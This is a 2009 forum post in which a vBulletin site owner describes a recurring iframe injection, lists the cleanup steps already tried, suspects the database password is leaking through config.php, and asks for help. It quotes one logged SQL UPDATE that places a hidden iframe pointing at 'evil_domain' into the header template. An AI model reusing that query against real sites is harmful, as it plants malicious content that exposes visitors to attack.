11-14-2009, 12:31 PM
Join Date: Nov 2008
|I've been suffering from an iframe attack for 10 days. My site is a mainly vBulletin site and a few addons. This is not a typical iframe injection to php files and i've already followed every iframe cleaning, iframe protection related suggestions (including formatting my pc, scanning my servers, changing password and restoring backups)
I've also disabled custom addons-script. But somehow, the hacker (or it may still be a virus) can add iframes to my templates.
The iframe is being injected via sql queries. Sample code from my mysql logs:
Now another big forum site is infected, too. I'm not alone. AND YES, THEY ARE USING LITESPEED like me!
16905 Query UPDATE template SET template=concat('<iframe width=1 height=1 border=0 frameborder=0 src=\\"evil_domain\\"></iframe>', template), template_un=concat('<iframe width=1 height=1 border=0 frameborder=0 src=\\"evil_domain\\"></iframe>', template_un) where title='header'
This is the only way i can slowdown or stop the hacker-virus for a while:
-I remove the old database user from my database.
-I create a new database user.
-I edit my config.php and upload to server.
This way it doesn't add iframe to my header template for a few hours.. but then the same thing happens
Here's my theory: They can view my config.php as text and retrieve my database password from there.
There are no traces in access logs or there are none edited/updated php files. I guess they're simply having database access as i told above and they can easily execute queries.
Please help ASAP!